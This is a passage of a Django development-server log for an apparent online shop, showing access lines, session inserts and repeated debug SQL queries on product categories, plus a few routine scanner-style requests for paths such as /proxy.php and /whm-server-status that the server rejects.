/robots.txt [31/Dec/2019 01:05:47] "GET /robots.txt HTTP/1.0" 404 6341 [31/Dec/2019 01:05:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 01:05:55,097 utils 2749 140297212245760 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l4rubf86m4htlarj0yes2q391hi9b99p' LIMIT 1; args=('l4rubf86m4htlarj0yes2q391hi9b99p',) DEBUG 2019-12-31 01:05:55,099 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l4rubf86m4htlarj0yes2q391hi9b99p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T01:05:55.098009+00:00'::timestamptz); args=('l4rubf86m4htlarj0yes2q391hi9b99p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 1, 5, 55, 98009, tzinfo=)) [31/Dec/2019 01:05:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 01:10:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:10:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 01:10:42,567 utils 2749 140297212245760 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6w6sa67em0o32gyuicrmkcxg8msob7h9' LIMIT 1; args=('6w6sa67em0o32gyuicrmkcxg8msob7h9',) DEBUG 2019-12-31 01:10:42,569 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6w6sa67em0o32gyuicrmkcxg8msob7h9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T01:10:42.568287+00:00'::timestamptz); args=('6w6sa67em0o32gyuicrmkcxg8msob7h9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 1, 10, 42, 568287, tzinfo=)) [31/Dec/2019 01:10:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 01:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:20:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:25:14] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:30:54] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:36:20] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:41:23] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:46:25] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:53:46] "GET / HTTP/1.0" 302 0 [31/Dec/2019 01:58:49] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:17:51] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:22:54] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [31/Dec/2019 02:27:28] "GET /proxy.php HTTP/1.0" 404 6344 [31/Dec/2019 02:27:56] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:28:27] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-31 02:28:29,165 utils 2749 140297212245760 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8vcb2mjxu8zy6wvtfjmyi1sjwqkn7syt' LIMIT 1; args=('8vcb2mjxu8zy6wvtfjmyi1sjwqkn7syt',) DEBUG 2019-12-31 02:28:29,167 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8vcb2mjxu8zy6wvtfjmyi1sjwqkn7syt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T02:28:29.166492+00:00'::timestamptz); args=('8vcb2mjxu8zy6wvtfjmyi1sjwqkn7syt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 2, 28, 29, 166492, tzinfo=)) [31/Dec/2019 02:28:29] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 Not Found: /robots.txt [31/Dec/2019 02:28:33] "GET /robots.txt HTTP/1.0" 404 6341 [31/Dec/2019 02:28:41] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:36:37] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:41:43] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:46:46] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:51:48] "GET / HTTP/1.0" 302 0 [31/Dec/2019 02:56:51] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:14:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:19:09] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:24:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:32:51] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:37:54] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:42:56] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:44:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:47:59] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:53:01] "GET / HTTP/1.0" 302 0 [31/Dec/2019 03:58:04] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 04:01:24] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 04:01:25,398 utils 2749 140297212245760 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '11cftr218ff81hyx36spj4fsbqdk7mgm' LIMIT 1; args=('11cftr218ff81hyx36spj4fsbqdk7mgm',) DEBUG 2019-12-31 04:01:25,400 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('11cftr218ff81hyx36spj4fsbqdk7mgm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T04:01:25.398937+00:00'::timestamptz); args=('11cftr218ff81hyx36spj4fsbqdk7mgm', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 4, 1, 25, 398937, tzinfo=)) [31/Dec/2019 04:01:25] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:10:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:21:48] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 04:26:50] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:31:53] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:39:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:40:07] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:45:55] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:50:58] "GET / HTTP/1.0" 302 0 [31/Dec/2019 04:56:01] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:05:02] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:15:08] "GET / HTTP/1.0" 302 0 Not Found: /templets/lurd//lurd-add.htm [31/Dec/2019 05:16:59] "GET /templets/lurd//lurd-add.htm HTTP/1.0" 404 6391 [31/Dec/2019 05:20:10] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:25:13] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:30:15] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:39:07] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:44:09] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:49:12] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:54:14] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:59:17] "GET / HTTP/1.0" 302 0 [31/Dec/2019 05:59:59] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:11:35] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:20:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:25:13] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:30:16] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:35:54] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 06:41:16] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:46:19] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:52:42] "GET / HTTP/1.0" 302 0 [31/Dec/2019 06:57:45] "GET / HTTP/1.0" 302 0 [31/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 07:08:20,771 utils 2749 140297212245760 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 07:08:20,781 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 07:08:20,786 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 07:08:20,789 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 07:08:20,794 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 07:08:20,797 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 07:08:20,800 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 07:08:20,803 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 07:08:20,806 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 07:08:20,811 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 07:08:20,814 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 07:08:20,817 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 07:08:20,820 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 07:08:20,823 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 07:08:20,826 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 07:08:20,828 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 07:08:20,831 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 07:08:20,833 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 07:08:20,836 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 07:08:20,840 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 07:08:20,842 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 07:08:20,844 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 07:08:20,846 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 07:08:20,849 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 07:08:20,851 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 07:08:20,854 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 07:08:20,856 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 07:08:20,859 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 07:08:20,861 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 07:08:20,864 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 07:08:20,867 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 07:08:20,869 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 07:08:20,871 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 07:08:20,873 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 07:08:20,876 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 07:08:20,880 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 07:08:20,882 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 07:08:20,884 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 07:08:20,886 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 07:08:20,888 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 07:08:20,891 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 07:08:20,893 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 07:08:20,895 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 07:08:20,898 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 07:08:20,900 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 07:08:20,903 utils 2749 140297212245760 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 